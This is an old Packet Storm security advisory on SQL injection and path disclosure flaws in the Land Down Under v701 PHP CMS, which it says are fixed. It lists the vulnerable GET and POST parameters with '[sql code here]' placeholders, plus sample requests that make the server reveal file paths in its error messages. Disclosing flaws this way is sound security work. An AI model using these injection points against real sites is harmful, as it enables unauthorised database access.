mp-ldu.txt

2004-11-02T00:00:00
ID PACKETSTORM:34906
Type packetstorm
Reporter maxpatrol.com
Modified 2004-11-02T00:00:00

Description

                                        
                                            `Multiple SQL-injections in Land Down Under v701  
Date: 30.10.04  
Application: Land Down Under v701  
Platform: PHP  
Severity: Medium  
Link: http://www.neocrome.net  
Vendor Status  
Vulnerabilities have been fixed.  
  
  
Details  
  
An input validation vulnerability was reported in Land Down Under v701. A remote user can conduct SQL injection attack.  
  
  
1. SQL-injections in GET  
/users.php?f=1&s=1'[sql code here]&w=asc&d=50  
/users.php?f=1&s=name&w=1'[sql code here]&d=50  
/users.php?f=1&s=name&w=asc&d=1'[sql code here]  
/users.php?f=1&s=1'[sql code here]&w=asc  
/users.php?f=1&s=name&w=1'[sql code here]  
/comments.php?id=1"[sql code here]  
  
  
  
2. SQL-injections in POST  
POST /auth.php?m=register&a=add HTTP/1.1  
Host: www.neocrome.net  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 123  
rusername="[sql code here]&remail=scanner@ptsecurity.com&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1  
POST /auth.php?m=register&a=add HTTP/1.1  
Host: www.neocrome.net  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 102  
rusername=1&remail="[sql code here]&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1  
  
  
  
3. Path disclosures:  
/plug.php?h=1'  
Result:  
<...>  
<br />  
<b>Warning</b>: fopen(system/help/1.txt): failed to open stream: No such file or directory in <b>/home/neocrome/public_html/system/core/plug.inc.php</b> on line <b>266</b><br/>  
Couldn't find a file : system/help/1.txt  
<...>  
  
POST /auth.php?m=login&a=check HTTP/1.1  
Host: www.neocrome.net  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 52  
PHPSESSID="&rusername=1&rpassword=1&x=1&rcookiettl=1  
  
  
  
Result:  
<...>  
ion_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in <b>/home/neocrome/public_html/system/common.php</b> on line <b>169</b><br />  
<...>  
  
  
  
Impact  
A remote user can execute SQL commands on the underlying database.  
Solution  
Check for update: http://www.neocrome.net/index.php?msingle&id91.  
`